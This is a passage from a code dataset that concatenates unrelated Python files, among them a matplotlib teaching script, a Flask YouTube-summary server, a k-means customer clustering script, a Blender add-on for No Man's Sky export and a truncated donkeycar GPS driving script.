db.Column(db.Numeric)\n","sub_path":"xac/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"416852393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nPráctica TEII - Bloque 4 - Código de la sesión 3 de prácticas\n'''\n\nimport sys\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mult import mult\n\n\n# Función auxiliar: muestra la figura matplotlib pendiente y espera una pulsación de tecla:\n#@profile\ndef show_plot_and_wait_for_key():\n plt.draw()\n plt.pause(0.01)\n input(\"\")\n plt.close()\n\n\n# Función auxiliar que muestra en matplotlib los arrays de entrada y de salida:\ndef plot_values(values_in, values_out, line_else_bars=True, width=0.5):\n if line_else_bars == True:\n plt.plot(values_in, color = 'r', label=\"Input values\")\n plt.plot(values_out, color = 'g', label=\"Output values\") \n else:\n plt.bar(np.arange(len(values_in)) - width, values_in, width=width, color='r', \n label=\"Input values\")\n plt.bar(np.arange(len(values_out)), values_out, width=width, color='g', \n label=\"Output values\")\n\n plt.title('Matplotlib example (using {})'.format([\"bars\", \"lines\"][line_else_bars]))\n plt.legend()\n plt.xlabel('Array indices')\n plt.ylabel('Values')\n\n# Código main:\ndef main(): \n # Control de argumentos de línea de comandos:\n if len(sys.argv) != 2:\n print(\"Uso: {} scale\".format(sys.argv[0]))\n sys.exit(0)\n # Escala N:\n try:\n N = float(sys.argv[1])\n if not (-5.0 <= N <= 5.0):\n raise ValueError()\n except:\n print(\"N must be a float value between -5.0 and +5.0\")\n sys.exit(-1)\n\n # Generamos una serie aleatoria creciente, a partir de la suma acumulativa números aleatorios \n # entre 0 y 1:\n SIZE = 50 # Tamaño del array.\n inp_arr = np.cumsum(np.random.rand(SIZE))\n out_arr = np.zeros_like(inp_arr)\n\n # Llamada a la función externa a través de su wrapper, con la correspondiente toma de tiempo:\n t0 = time.time_ns()\n out_arr = mult(inp_arr, N)\n t_exec = (time.time_ns()-t0)/1.0e9\n print(\"La función mult ha tardado {} segundos en ejecutarse.\".format(t_exec))\n\n # Mostramos gráficas (de líneas y de barras) y terminamos: \n plot_values(inp_arr, out_arr)\n show_plot_and_wait_for_key()\n plot_values(inp_arr, out_arr, line_else_bars=False)\n show_plot_and_wait_for_key()\n \nif __name__ == '__main__':\n main()\n","sub_path":"src/Practica3.py","file_name":"Practica3.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"381323113","text":"import time\nimport logging\n\nfrom utils.sql import execute_sql, query_to_tuples\n\nlog = logging.getLogger(__name__)\n\n\ndef hitgroups(cid):\n r = execute_sql(\"select distinct group_id from hits_mv where crawl_id = %s\", cid)\n return [g[0] for g in r.fetchall()]\n\n\ndef last_crawlids(limit=10):\n r = execute_sql(\"select crawl_id from hits_mv order by crawl_id desc limit %s\", limit)\n return [c[0] for c in r.fetchall()]\n\n\ndef last_crawlid():\n return execute_sql(\"select crawl_id from hits_mv order by crawl_id desc limit 1;\").fetchall()[0][0]\n\n\ndef updatehitgroup(g, cid):\n \"\"\"Updates hits_mv.hits_available by subtracting current group's\n hits_available.\n\n \"\"\"\n\n prev = execute_sql(\"\"\"select hits_available from hits_mv\n where\n crawl_id between %s and %s and\n group_id = '%s'\n order by crawl_id desc\n limit 1;\"\"\" % (cid - 100, cid - 1, g)).fetchall()\n prev = prev[0][0] if prev else 0\n\n execute_sql(\"\"\"update hits_mv set hits_diff = hits_available - %s where\n group_id = '%s' and crawl_id = %s;\"\"\" % (prev, g, cid))\n\n\ndef update_cid(cid):\n \"\"\"Updates hits_diff on hits_mv record related to crawl with id equal to\n cid.\n\n \"\"\"\n st = time.time()\n count = 0\n for i, g in enumerate(query_to_tuples(\"select distinct group_id from hits_mv where crawl_id = %s\", cid)):\n g = g[0]\n if i == 0:\n log.info(\"processing %s, %s %s\", i, cid, g)\n\n updatehitgroup(g, cid)\n count += 1\n\n execute_sql(\"commit;\")\n\n log.info(\"Updated crawl {0} in {1}. {2} groups processed\".format(\n cid, time.time() - st, count))\n\n return count\n","sub_path":"app/mturk/main/management/commands/diffs.py","file_name":"diffs.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427891888","text":"from flask import Flask, jsonify ,render_template ,request, Response\nimport os\nimport csv\nimport json\nimport urllib.parse\nimport glob\nimport subprocess\nimport requests\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\n@app.route('/')\ndef index():\n name_list=[]\n with open(\"./name_list.csv\") as f:\n for videoId,videoName in csv.reader(f):\n name_list.append((videoId,videoName))\n return render_template(\"index.html\",name_list=name_list)\n\n@app.route('/post_url',methods=[\"POST\"])\ndef post_url():\n url = request.form[\"youtube_url\"]\n qs = urllib.parse.urlparse(url).query\n video_id = []\n try:\n video_id = urllib.parse.parse_qs(qs)[\"v\"]\n except KeyError:\n url = requests.get(request.form[\"youtube_url\"]).url\n qs = urllib.parse.urlparse(url).query\n video_id = urllib.parse.parse_qs(qs)[\"v\"]\n response = Response()\n csvfile = \"\"\n with open(\"./error.txt\") as f:\n for row in csv.reader(f):\n if(row[0] == video_id[0]):\n return Response(response=json.dumps([\"error\"]), status=200)\n with open(\"./making.txt\") as f:\n for row in csv.reader(f):\n if(row[0] == video_id[0]):\n return Response(response=json.dumps([\"making\"]), status=200)\n with open(\"./name_list.csv\") as f:\n for videoId,videoName in csv.reader(f):\n if(videoId==\"https://www.youtube.com/watch?v=\"+video_id[0]):\n csvfile = \"./summarization_by_comment_count_and_bert/\"+video_id[0]+\".csv\"\n if(csvfile!=\"\"):\n json_list = []\n with open(csvfile) as f:\n for row in csv.reader(f):\n json_list.append(row)\n return Response(response=json.dumps(json_list), status=200)\n\n tmp_files = glob.glob('./tmp/*')\n if(len(tmp_files)!=0):\n return Response(response=json.dumps([\"crowd\"]), status=200)\n\n subprocess.Popen( [\"bash\",\"make_summarization.sh\",\"https://www.youtube.com/watch?v=\"+video_id[0],video_id[0]])\n\n return Response(response=json.dumps([\"making\"]), status=200)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80)\n","sub_path":"ML_server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"403189204","text":"# -*- coding: UTF-8 -*-\n\n# 挖坑不填的程序员\n\n\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as ft\n\n\ninput_file = 'scale_data.csv'\nk = 5\n\ndata = pd.read_csv(input_file, encoding='utf-8')\nkmodel = KMeans(n_clusters=k, n_jobs=4)\nkmodel.fit(data)\n\nr1 = pd.Series(kmodel.labels_)\nr1 = r1.value_counts()\nr2 = pd.DataFrame(kmodel.cluster_centers_)\nr3 = pd.Series([u'用户群1', u'用户群2', u'用户群3', u'用户群4', u'用户群5'])\nr = pd.concat([r3, r1, r2], axis=1)\nr.columns = ['聚类类别', '聚类个数'] + list(data.columns)\nr.to_csv('result_cluster.csv', encoding='utf-8', index=False)\n\n# 绘制图\nch_font = ft.FontProperties(fname='/Library/Fonts/Songti.ttc')\n\nlabels = np.array(list(data.columns))\ndata_length = 5\nr4 = r2.T\nr4.columns = list(data.columns)\n\nfig = plt.figure()\ny = []\n\nfor x in list(data.columns):\n dt = r4[x]\n dt = np.concatenate((dt, [dt[0]]))\n y.append(dt)\n\nax = fig.add_subplot(111, polar=True)\nangles = np.linspace(0, 2*np.pi, data_length, endpoint=False)\nangles = np.concatenate((angles, [angles[0]]))\n\nax.plot(angles, y[0], 'b-', linewidth=2)\nax.plot(angles, y[1], 'r-', linewidth=2)\nax.plot(angles, y[2], 'g-', linewidth=2)\nax.plot(angles, y[3], 'y-', linewidth=2)\nax.plot(angles, y[4], 'm-', linewidth=2)\n\nax.legend(r3, loc=(0.95, 0.90), labelspacing=0.1, prop=ch_font)\nax.set_thetagrids(angles * 180/np.pi, labels, fontproperties=ch_font)\nax.set_title('客户分析', va='bottom', fontproperties=ch_font)\n\nax.grid(True)\nplt.show()\n\n\n","sub_path":"customer_value_analysis/k-means_cluster.py","file_name":"k-means_cluster.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200839998","text":"import os\n\nPROJECT_PATH = os.path.abspath('')\nDATABASE = {\n 'main': {\n 'engine': 'postgresql',\n 'name': 'erp',\n 'user': 'postgres',\n 'pwd': 'postgres',\n 'host': 'localhost',\n 'port': '5432'\n }\n }\nPROJECT_TITLE = \"ERP\"\nADMIN_SESSION_DAY = 1\nUSER_SESSION_DAY = 7\nMODULES = (\n 'modules_management',\n 'user_management',\n 'setting.unit',\n 'setting.company',\n 'setting.vat',\n 'inventory.item',\n 'inventory.warehouse',\n 'inventory.item_delivery',\n #'inventory.item_out',\n #'inventory.item_in',\n 'production.production_item_out',\n 'production.production_machine',\n )\n","sub_path":"modules/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450138123","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\nmemory = np.load('collision_memory.npy', allow_pickle=True)\n_memory = []\nfor data in memory:\n\tflag = False\n\teps = 0.1\n\tif (np.linalg.norm(data[2]) < 0.01):\n\t\tif np.abs(data[1][0]) > eps:\n\t\t\tflag = True\n\t\tif data[1][1] - data[0][1] > eps:\n\t\t\tflag = True\n\t\tif data[3][1] > eps:\n\t\t\tflag = True\n\t\tif np.abs(data[3][0] - data[0][0]) > eps:\n\t\t\tflag = True\n\tif flag:\n\t\t_memory.append(data)\n\tcontinue\n\tprint(data)\n\tplt.plot([0.29, 0.29-data[0][0]], [0, -data[0][1]], c='red')\n\tplt.plot([0.29, 0.29+data[1][0]], [0, data[1][1]], c='#FF1493')\n\tplt.plot([0, data[2][0]], [0, data[2][1]], c='#4B0082')\n\tplt.plot([0, data[3][0]], [0, data[3][1]], c='blue')\n\tplt.xlim(-1, 1)\n\tplt.ylim(-1, 1)\n\tplt.show()\nprint(len(memory), len(_memory))\nmemory = np.array(_memory)\ninputs = np.concatenate([memory[:, 0], memory[:, 2]], axis = 1)\noutputs = np.concatenate([memory[:, 1], memory[:, 3]], axis = 1)\n\t\ndef getCollisionModel():\n\tx = tf.keras.Input(4)\n\tm = tf.keras.layers.Dense(8, activation = 'relu', kernel_initializer = 'random_uniform')(x)\n\ty = tf.keras.layers.Dense(4, kernel_initializer = 'random_uniform')(m)\n\tmodel = tf.keras.Model(inputs = x, outputs = y)\n\tmodel.compile(optimizer = tf.keras.optimizers.Adam(lr = 1e-3, decay = 1e-8), loss=[\"mse\"], metrics = [\"mae\"])\n\treturn model\ncollision_model = getCollisionModel()\n\ncollision_model = tf.keras.models.load_model(\"collision.hdf5\")\ncollision_model.summary()\n\n'''\npred = collision_model.predict(inputs)\nfor i in range(10):\n\tprint(outputs[i])\n\tprint(pred[i])\n\tprint()\n#exit(0)\ncollision_model_checkpoint = tf.keras.callbacks.ModelCheckpoint(\"collision.hdf5\", monitor='loss', verbose=0, save_best_only=True)\nlog_dir=\"logs/collision\"\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\ntry:\n\tcollision_model.fit(inputs, outputs, validation_split = 0.2, epochs=1000, callbacks=[collision_model_checkpoint, tensorboard_callback])\nexcept:\n\tpass\n'''\nfor i in range(len(collision_model.get_layer('dense').get_weights())):\n\tprint(collision_model.get_layer('dense').get_weights()[i])\n\tprint('******************************************************')\nfor i in range(len(collision_model.get_layer('dense_1').get_weights())):\n\tprint(collision_model.get_layer('dense_1').get_weights()[i])\n\tprint('******************************************************')","sub_path":"collision_learning.py","file_name":"collision_learning.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458386813","text":"# All the custom panels and properties for all the different object types\n\nimport bpy\nfrom bpy.props import StringProperty, BoolProperty, EnumProperty, IntProperty, FloatProperty\n\n\"\"\" Various properties for each of the different node types \"\"\"\n\nclass NMSNodeProperties(bpy.types.PropertyGroup):\n \"\"\" Properties for the NMS Nodes \"\"\"\n # is the is_NMS_node needed??? (don't think so... flag for deletion...)\n is_NMS_node = BoolProperty(name = \"Is NMS Node?\",\n description = \"Enable if the object is a node in the scene file\",\n default = True)\n node_types = EnumProperty(name = \"Node Types\",\n description = \"Select what type of Node this will be\",\n items = [(\"Mesh\" , \"Mesh\" , \"Standard mesh for visible objects.\"),\n (\"Collision\", \"Collision\", \"Shape of collision for object.\"),\n (\"Locator\", \"Locator\", \"Locator object, used for interaction locations etc.\"),\n (\"Reference\", \"Reference\", \"Node used to allow other scenes to be placed at this point in space\"),\n (\"Joint\", \"Joint\", \"Node used primarily for animations. All meshes that are to be animated MUST be a direct child of a joint object\"),\n (\"Light\", \"Light\", \"Light that will emit light of a certain colour\")])\n override_name = StringProperty(name = \"Override name\",\n description = \"A name to be used to override the name given from blender. This should be used with caution and sparingly. Only use if you require multiple nodes in the scene to have the same name. Will not work for Collisions.\")\n\nclass NMSMeshProperties(bpy.types.PropertyGroup):\n has_entity = BoolProperty(name = \"Requires Entity\",\n description = \"Whether or not the mesh requires an entity file. Not all meshes require an entity file. Read the detailed guidelines in the readme for more details.\",\n default = False)\n material_path = StringProperty(name = \"Material\",\n description = \"(Optional) Path to material mbin file to use instead of automattical exporting material attached to this mesh.\")\n\nclass NMSLightProperties(bpy.types.PropertyGroup):\n intensity_value = FloatProperty(name = \"Intensity\",\n description = \"Intensity of the light.\")\n FOV_value = FloatProperty(name = \"FOV\",\n description = \"Field if View of the lightsource.\",\n default = 360,\n min = 0,\n max = 360)\n\nclass NMSAnimationProperties(bpy.types.PropertyGroup):\n anim_name = StringProperty(name = \"Animation Name\",\n description = \"Name of the animation. All animations with the same name here will be combined into one.\")\n anim_loops_choice = EnumProperty(name = \"Animation Type\",\n description = \"Type of animation\",\n items = [(\"OneShot\" , \"OneShot\" , \"Animation runs once (per trigger)\"),\n (\"Loop\", \"Loop\", \"Animation loops continuously\")])\n\nclass NMSLocatorProperties(bpy.types.PropertyGroup):\n has_entity = BoolProperty(name = \"Requires Entity\",\n description = \"Whether or not the mesh requires an entity file. Not all meshes require an entity file. Read the detailed guidelines in the readme for more details.\",\n default = False)\n\nclass NMSRotationProperties(bpy.types.PropertyGroup):\n speed = FloatProperty(name = \"Speed\",\n description = \"Speed of the rotation around the specified axis.\")\n\nclass NMSReferenceProperties(bpy.types.PropertyGroup):\n reference_path = StringProperty(name = \"Reference Path\",\n description = \"Path to scene to be referenced at this location.\")\n\nclass NMSSceneProperties(bpy.types.PropertyGroup):\n batch_mode = BoolProperty(name = \"Batch Mode\",\n description = \"If ticked, each direct child of this node will be exported separately\",\n default = False)\n group_name = StringProperty(name = \"Group Name\",\n description = \"Group name so that models that all belong in the same folder are placed there (path becomes group_name/name)\")\n create_tangents = BoolProperty(name = \"Create Tangents\",\n description = \"Whether or not to generate tangents along with the mesh conversion (Enable only if you are sure about your UV Map).\",\n default = True)\n dont_compile = BoolProperty(name = \"Don't compile to .mbin\",\n description = \"If true, the exml files will not be compiled to an mbin file. This saves a lot of time waiting for the geometry files to compile\",\n default = False) ### this needs to be removed\n AT_only = BoolProperty(name = \"ActionTriggers Only\",\n description = \"If this box is ticked, all the action trigger data will be exported directly to an ENTITY file in the specified location with the project name. Anything else in the project is ignored\",\n default = False)\n is_proc = BoolProperty(name = \"Is a proc-gen scene?\",\n description = \"If checked, then a new panel will appear that can be used to describe the proc-gen nature of the scene\",\n default = False)\n\nclass NMSCollisionProperties(bpy.types.PropertyGroup):\n collision_types = EnumProperty(name = \"Collision Types\",\n description = \"Type of collision to be used\",\n items = [(\"Mesh\" , \"Mesh\" , \"Mesh Collision\"),\n (\"Box\", \"Box\", \"Box (rectangular prism collision\"),\n (\"Sphere\", \"Sphere\", \"Spherical collision\"),\n (\"Cylinder\", \"Cylinder\", \"Cylindrical collision\")])\n transform_type = EnumProperty(name = \"Scale Transform\",\n description = \"Whether or not to use the transform data, or the dimensions of the primitive\",\n items = [(\"Transform\", \"Transform\", \"Use Scale transform data\"),\n (\"Dimensions\", \"Dimensions\", \"Use the inherent object dimensions (will also retain the transform data in the scene)\")])\n\nclass NMSDescriptorProperties(bpy.types.PropertyGroup):\n choice_types = EnumProperty(name = \"Proc type\",\n description = \"Whether or not to have the model always eselected, or randomly selected.\",\n items = [(\"Always\" , \"Always\" , \"Node is always rendered (provided parents are rendered)\"),\n (\"Random\", \"Random\", \"Node is randomly selected out of all others in the same hierarchy\")])\n proc_prefix = StringProperty(name = \"Proc prefix\",\n description = \"The prefix to put in front of the part name to indicate what procedural rule to be grouped with.\")\n \n\n\"\"\" Various panels for each of the property types \"\"\"\n\nclass NMSNodePropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Node Properties\"\n bl_idname = \"OBJECT_PT_node_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and not context.object.name.startswith(\"NMS_SCENE\"):\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSNode_props, \"node_types\", expand=True)\n row = layout.row()\n row.prop(obj.NMSNode_props, \"override_name\")\n\nclass NMSReferencePropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Reference Properties\"\n bl_idname = \"OBJECT_PT_reference_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Reference':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSReference_props, \"reference_path\")\n\nclass NMSMeshPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Mesh Properties\"\n bl_idname = \"OBJECT_PT_mesh_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Mesh' and not context.object.name.startswith(\"NMS_SCENE\"):\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSMesh_props, \"has_entity\")\n row = layout.row()\n row.prop(obj.NMSMesh_props, \"material_path\")\n\nclass NMSAnimationPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Animation Properties\"\n bl_idname = \"OBJECT_PT_animation_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.animation_data:\n if context.object.animation_data.action:\n return True\n else:\n return False\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSAnimation_props, \"anim_name\")\n row = layout.row()\n row.prop(obj.NMSAnimation_props, \"anim_loops_choice\", expand = True)\n\nclass NMSLocatorPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Locator Properties\"\n bl_idname = \"OBJECT_PT_locator_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Locator':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSLocator_props, \"has_entity\")\n\nclass NMSRotationPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Rotation Properties\"\n bl_idname = \"OBJECT_PT_rotation_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.upper() == 'ROTATION':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSRotation_props, \"speed\")\n\nclass NMSLightPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Light Properties\"\n bl_idname = \"OBJECT_PT_light_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Light':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSLight_props, \"intensity_value\")\n row = layout.row()\n row.prop(obj.NMSLight_props, \"FOV_value\")\n\nclass NMSCollisionPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Collision Properties\"\n bl_idname = \"OBJECT_PT_collision_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Collision':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSCollision_props, \"collision_types\", expand=True)\n row = layout.row()\n row.prop(obj.NMSCollision_props, \"transform_type\", expand=True)\n\nclass NMSScenePropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Scene Properties\"\n bl_idname = \"OBJECT_PT_scene_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n # this should only show for an object that is called NMS_SCENE\n if context.object.name.startswith(\"NMS_SCENE\"):\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSScene_props, \"batch_mode\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"group_name\", expand = True)\n row = layout.row()\n row.prop(obj.NMSScene_props, \"create_tangents\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"dont_compile\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"AT_only\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"is_proc\")\n\nclass NMSDescriptorPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Descriptor Properties\"\n bl_idname = \"OBJECT_PT_descriptor_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n try:\n if (context.object.name.startswith(\"NMS\")\n and (context.object.NMSNode_props.node_types == 'Mesh' or\n context.object.NMSNode_props.node_types == \"Locator\" or\n context.object.NMSNode_props.node_types == \"Reference\")\n and bpy.context.scene.objects['NMS_SCENE'].NMSScene_props.is_proc == True\n and not context.object == bpy.context.scene.objects['NMS_SCENE']):\n return True\n else:\n return False\n except:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSDescriptor_props, \"choice_types\", expand=False)\n row = layout.row()\n row.prop(obj.NMSDescriptor_props, \"proc_prefix\")\n\nclass NMSPanels():\n @staticmethod\n def register():\n # register the properties\n bpy.utils.register_class(NMSNodeProperties)\n bpy.utils.register_class(NMSSceneProperties)\n bpy.utils.register_class(NMSMeshProperties)\n bpy.utils.register_class(NMSReferenceProperties)\n bpy.utils.register_class(NMSLocatorProperties)\n bpy.utils.register_class(NMSLightProperties)\n bpy.utils.register_class(NMSRotationProperties)\n bpy.utils.register_class(NMSAnimationProperties)\n bpy.utils.register_class(NMSCollisionProperties)\n bpy.utils.register_class(NMSDescriptorProperties)\n # link the properties with the objects' internal variables\n bpy.types.Object.NMSNode_props = bpy.props.PointerProperty(type=NMSNodeProperties)\n bpy.types.Object.NMSScene_props = bpy.props.PointerProperty(type=NMSSceneProperties)\n bpy.types.Object.NMSMesh_props = bpy.props.PointerProperty(type=NMSMeshProperties)\n bpy.types.Object.NMSReference_props = bpy.props.PointerProperty(type=NMSReferenceProperties)\n bpy.types.Object.NMSLocator_props = bpy.props.PointerProperty(type=NMSLocatorProperties)\n bpy.types.Object.NMSRotation_props = bpy.props.PointerProperty(type=NMSRotationProperties)\n bpy.types.Object.NMSLight_props = bpy.props.PointerProperty(type=NMSLightProperties)\n bpy.types.Object.NMSAnimation_props = bpy.props.PointerProperty(type=NMSAnimationProperties)\n bpy.types.Object.NMSCollision_props = bpy.props.PointerProperty(type=NMSCollisionProperties)\n bpy.types.Object.NMSDescriptor_props = bpy.props.PointerProperty(type=NMSDescriptorProperties)\n # register the panels\n bpy.utils.register_class(NMSScenePropertyPanel)\n bpy.utils.register_class(NMSNodePropertyPanel)\n bpy.utils.register_class(NMSMeshPropertyPanel)\n bpy.utils.register_class(NMSReferencePropertyPanel)\n bpy.utils.register_class(NMSLocatorPropertyPanel)\n bpy.utils.register_class(NMSRotationPropertyPanel)\n bpy.utils.register_class(NMSLightPropertyPanel)\n bpy.utils.register_class(NMSAnimationPropertyPanel)\n bpy.utils.register_class(NMSCollisionPropertyPanel)\n bpy.utils.register_class(NMSDescriptorPropertyPanel)\n\n @staticmethod\n def unregister():\n # unregister the property classes\n bpy.utils.unregister_class(NMSNodeProperties)\n bpy.utils.unregister_class(NMSSceneProperties)\n bpy.utils.unregister_class(NMSMeshProperties)\n bpy.utils.unregister_class(NMSRotationProperties)\n bpy.utils.unregister_class(NMSReferenceProperties)\n bpy.utils.unregister_class(NMSLocatorProperties)\n bpy.utils.unregister_class(NMSLightProperties)\n bpy.utils.unregister_class(NMSAnimationProperties)\n bpy.utils.unregister_class(NMSCollisionProperties)\n bpy.utils.unregister_class(NMSDescriptorProperties)\n # delete the properties from the objects\n del bpy.types.Object.NMSNode_props\n del bpy.types.Object.NMSScene_props\n del bpy.types.Object.NMSMesh_props\n del bpy.types.Object.NMSReference_props\n del bpy.types.Object.NMSRotation_props\n del bpy.types.Object.NMSLocator_props\n del bpy.types.Object.NMSLight_props\n del bpy.types.Object.NMSAnimation_props\n del bpy.types.Object.NMSCollision_props\n del bpy.types.Object.NMSDescriptor_props\n # unregister the panels\n bpy.utils.unregister_class(NMSScenePropertyPanel)\n bpy.utils.unregister_class(NMSNodePropertyPanel)\n bpy.utils.unregister_class(NMSMeshPropertyPanel)\n bpy.utils.unregister_class(NMSReferencePropertyPanel)\n bpy.utils.unregister_class(NMSLocatorPropertyPanel)\n bpy.utils.unregister_class(NMSRotationPropertyPanel)\n bpy.utils.unregister_class(NMSLightPropertyPanel)\n bpy.utils.unregister_class(NMSAnimationPropertyPanel)\n bpy.utils.unregister_class(NMSCollisionPropertyPanel)\n bpy.utils.unregister_class(NMSDescriptorPropertyPanel)\n","sub_path":"BlenderExtensions/CustomPanels.py","file_name":"CustomPanels.py","file_ext":"py","file_size_in_byte":19954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612292523","text":"#!/usr/bin/env python3\n\"\"\"\ngps_manage.py\n\nScript to control donkey car with GPS navigation. Waypoints are set with GPS coordinates in degrees.\n\nCall: gps_manage.py -drive\n\"\"\"\n\n# import GPS Planner and other DK parts\nimport donkeycar as dk\nfrom donkeycar.parts.gps import GPS\nfrom donkeycar.parts.planner import Planner\nfrom donkeycar.vehicle import Vehicle\nfrom donkeycar.parts.actuator import PCA9685, PWMSteering, PWMThrottle\n\n# other important modules\nimport serial\nimport pynmea2\nimport time\nimport threading\n\n\ndef drive(cfg, goalLocation):\n \"\"\"\n drive(cfg, goalLocation)\n\n Add GPS, Planner, and actuator parts and call DK Vehicle.py to run car.\n @param: cfg - configuration file from dk calibration\n goalLocation - list of GPS coordinates in degrees\n @return: None\n \"\"\"\n # initialize vehicle\n V = Vehicle()\n\n # GPS is a DK part that will poll GPS data from serial port\n # and output current location in radians.\n gps = GPS(cfg.BAUD_RATE, cfg.PORT, cfg.TIMEOUT)\n\n # Planner is a DK part that calculates control signals to actuators based on current location\n # from GPS\n planner = Planner(goalLocation=goalLocation, steer_gain=cfg.STEERING_P_GAIN,\n throttle_gain=cfg.THROTTLE_P_GAIN)\n\n # Actuators: steering and throttle\n steering_controller = PCA9685(cfg.STEERING_CHANNEL)\n steering = PWMSteering(controller=steering_controller,\n left_pulse=cfg.STEERING_LEFT_PWM,\n right_pulse=cfg.STEERING_RIGHT_PWM)\n\n throttle_controller = PCA9685(cfg.THROTTLE_CHANNEL)\n throttle = PWMThrottle(controller=throttle_controller,\n max_pulse=cfg.THROTTLE_FORWARD_PWM,\n zero_pulse=cfg.THROTTLE_STOPPED_PWM,\n 